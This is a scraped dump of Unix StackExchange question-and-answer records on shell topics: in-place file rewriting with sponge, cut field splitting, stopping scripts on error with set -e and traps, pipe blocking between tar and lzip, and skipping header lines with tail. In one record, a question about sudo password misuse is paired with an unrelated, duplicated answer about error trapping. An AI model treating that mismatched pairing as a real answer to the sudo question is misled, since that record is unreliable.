"https://unix.stackexchange.com/questions/557822",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/45556/"
]
} |
558,773 | One might think that echo foo >a
cat a | rev >a would leave a containing oof ; but instead it is left empty. Why? How would one otherwise apply rev to a ? | There's an app for that! The sponge command from moreutils is designed for precisely this. If you are running Linux, it is likely already installed, if not search your operating system's repositories for sponge or moreutils . Then, you can do: echo foo >a
cat a | rev | sponge a Or, avoiding the UUoC : rev a | sponge a The reason for this behavior is down to the order in which your commands are run. The > a is actually the very first thing executed and > file empties the file. For example: $ echo "foo" > file
$ cat file
foo
$ > file
$ cat file
$ So, when you run cat a | rev >a what actually happens is that the > a is run first, emptying the file, so when the cat a is executed the file is already empty. This is precisely why sponge was written (from man sponge , emphasis mine): sponge reads standard input and writes it out to the specified file. Unlike a shell redirect, sponge soaks up all its input before writing
the output file. This allows constructing pipelines that read from and
write to the same file. | {
"source": [
"https://unix.stackexchange.com/questions/558773",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/134690/"
]
} |
559,236 | I am able to filter out jobs which got stuck in our queueing system with: > qjobs | grep "racon"
5240703 racon-3/utg001564l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5241418 racon-3/utg002276l-racon-3.fasta H 1 1 0 10.0 0.0 150 :02
5241902 racon-3/utg002759l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5242060 racon-3/utg002919l-racon-3.fasta H 1 1 0 10.0 0.0 150 :04
5242273 racon-3/utg003133l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03
5242412 racon-3/utg003270l-racon-3.fasta H 1 1 0 10.0 0.0 150 :04
5242466 racon-3/utg003325l-racon-3.fasta H 1 1 0 10.0 0.0 150 :03 However, qjobs | grep "racon" | cut -d " " -f2 did not return e.g. racon-3/utg003325l-racon-3.fasta . What did I miss? | Every space counts towards the field number, even leading and consecutive ones. Hence, you need to use -f9 instead of -f2 . Alternatively, you can use awk '{ print $2 }' in place of the cut command entirely. | {
"source": [
"https://unix.stackexchange.com/questions/559236",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34872/"
]
} |
559,407 | Most Linux guides consist of pages like
"you need to run command_1 , then command_2 , then command_3 " etc. Since I don't want to waste my time running all of them manually, I'd rather create a script command_1
command_2
command_3 and run it once. But, more often than not, some commands will fail, and I will have no idea, which commands have failed. Also, usually all the rest commands make no sense if something failed earlier. So a better script would be something like (command_1 && echo OK command_1 || (echo FAILED command_1; false) )
&& (command_2 && echo OK command_2 || (echo FAILED command_2; false) )
&& (command_3 && echo OK command_3 || (echo FAILED command_3; false) )
&& echo DONE
|| echo FAILED But it requires to write too much boilerplate code, repeat each command 3 times, and there is too high chance, that I mistype some of the braces. Is there a more convenient way of doing what the last script does? In particular: run commands sequentially break if any command fails write, what command has failed, if any Allows normal interactions with commands: prints all output, and allows input from keyboard, if command asks anything. Answers summary (2 January 2020) There are 2 types of solutions: Those, that allow to copy-paste commands from guide without modifications, but they don't print the failed command in the end. So, if failed command produced a very long output, you will have to scroll a lot of lines up, to see, what command has failed. (All top answers) Those, that print the failed command in the last line, but require you to modify commands after copy-pasting them, either by adding quotations (answer by John), or by adding try statements and splitting chained commands into separate ones (answer by Jasen). You rock folks, but I'll leave this question opened for a while. Maybe someone knows a solution that satisfies both needs (print failed command on the last line & allow copy-pasting of commands without their modifications). | One option would be to put the commands in a bash script, and start it with set -e . This will cause the script to terminate early if any command exits with non-zero exit status. See also this question on stack overflow: https://stackoverflow.com/q/19622198/828193 To print the error, you could use trap 'do_something' ERR Where do_something is a command you would create to show the error. Here is an example of a script to see how it works: #!/bin/bash
set -e
trap 'echo "******* FAILED *******" 1>&2' ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to set -e And this is the output: $ ./test.sh
Command that succeeds
ls: cannot access 'non_existent_file': No such file or directory
******* FAILED ******* Also, as mentioned by @jick , keep in mind that the exit status of a pipeline is by default the exit status of the final command in it. This means that if a non-final command in the pipeline fails, that won't be caught by set -e . To fix this problem if you are concerned with it, you can use set -o pipefail As suggested my @glenn jackman and @Monty Harder , using a function as the handler can make the script more readable, since it avoids nested quoting. Since we are using a function anyway now, I removed set -e entirely, and used exit 1 in the handler, which could also make it more readable for some: #!/bin/bash
error_handler() {
echo "******* FAILED *******" 1>&2
exit 1
}
trap error_handler ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to the exit in the handler The output is identical as above, though the exit status of the script is different. | {
"source": [
"https://unix.stackexchange.com/questions/559407",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/144004/"
]
} |
559,413 | If there's only 1 user on a system with sudo permission, can another program that ran by the user get root permission without the user knowing it if it has the sudo password? | One option would be to put the commands in a bash script, and start it with set -e . This will cause the script to terminate early if any command exits with non-zero exit status. See also this question on stack overflow: https://stackoverflow.com/q/19622198/828193 To print the error, you could use trap 'do_something' ERR Where do_something is a command you would create to show the error. Here is an example of a script to see how it works: #!/bin/bash
set -e
trap 'echo "******* FAILED *******" 1>&2' ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to set -e And this is the output: $ ./test.sh
Command that succeeds
ls: cannot access 'non_existent_file': No such file or directory
******* FAILED ******* Also, as mentioned by @jick , keep in mind that the exit status of a pipeline is by default the exit status of the final command in it. This means that if a non-final command in the pipeline fails, that won't be caught by set -e . To fix this problem if you are concerned with it, you can use set -o pipefail As suggested my @glenn jackman and @Monty Harder , using a function as the handler can make the script more readable, since it avoids nested quoting. Since we are using a function anyway now, I removed set -e entirely, and used exit 1 in the handler, which could also make it more readable for some: #!/bin/bash
error_handler() {
echo "******* FAILED *******" 1>&2
exit 1
}
trap error_handler ERR
echo 'Command that succeeds' # this command works
ls non_existent_file # this should fail
echo 'Unreachable command' # and this is never called
# due to the exit in the handler The output is identical as above, though the exit status of the script is different. | {
"source": [
"https://unix.stackexchange.com/questions/559413",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/388150/"
]
} |
559,985 | I want to tar a directory and write the result to stdout , then pipe it to a compression program, like this: tar -cvf - /tmp/source-dir | lzip -o /media/my-usb/result.lz - I have been using pipe all the time with commands which output several lines of text. Now I am wondering what would happen when I pipes a (fast) command with very large output such as tar and a very slow compression command followed? Will tar wait for its output to be consumed by lzip ? Or it just does as fast as it can then outputs everything to RAM? It will be a disaster in low RAM system if the latter is true. | When the data producer ( tar ) tries to write to the pipe too quickly for the consumer ( lzip ) to have time to read all of it, it will block until lzip has had time to read what tar is writing. There is a small buffer associated with the pipe, but its size is likely to be smaller than the size of most tar archives. There is no risk of filling up your system's RAM with your pipeline. "Blocking" simply means that when tar does a call to the write() library function (or equivalent), the call won't return until the data has been delivered to the pipe buffer, which could take a bit of time if lzip is slow to read from that same buffer. You should be able to see this in top where tar would slow down and sleep a lot compared to lzip (assuming tar is in fact quicker than lzip ). You would therefore not fill up a significant amount of RAM with your pipeline. To do that (if you wanted to), you could use something like pv in the middle, with some large buffer (here, a gigabyte): tar -cvf - /tmp/source-dir | pv --buffer-size 1G | lzip -o /media/my-usb/result.lz - This would still block tar whenever pv blocks. pv would block when its buffer is full and it can't write to lzip . The reverse situation works in a similar way, i.e. if you have a slow left-hand side of a pipe writing to a fast right-hand side, the consumer on the right would block on read() until there is data to be read from the pipe. This (data I/O) is the only thing that synchronises the processes taking part in a pipeline. Apart from reading and writing (and occasionally blocking while waiting for someone else to read or write), they would run independently of each other. | {
"source": [
"https://unix.stackexchange.com/questions/559985",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/352053/"
]
} |
561,322 | Here is the issue, I would like to count the number of jobs I have in the hpc, but it is not one of the readily provided features. So I made this simple script squeue -u user_name | wc -l where squeue prints all the jobs like the following > squeue -u user_name
JOBID PARTITION NAME USER ST TIME NODES NODELIST(REASON)
8840441 theory cteq fxm PD 0:00 1 (Resources)
8840442 theory cteq fxm PD 0:00 1 (Priority)
8840443 theory cteq fxm PD 0:00 1 (Priority)
8840444 theory cteq fxm PD 0:00 1 (Priority) which would be piped to wc and the number of lines would be counted. However, the first line is not an entry of the job. How may I instruct wc to skip the first line when counting? Or should I just take the output of wc and minus one to it? Thanks in advance! | There are many many ways to do this, the first I thought of was: squeue -u user_name | tail -n +2 | wc -l From the man page for tail : -n, --lines=[+]NUM output the last NUM lines, instead of the last 10;
or use -n +NUM to output starting with line NUM So fo you -n +2 should skip the first line. You can also use the sort form of tail: tail +2 | {
"source": [
"https://unix.stackexchange.com/questions/561322",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/376814/"
]
} |
Subsets and Splits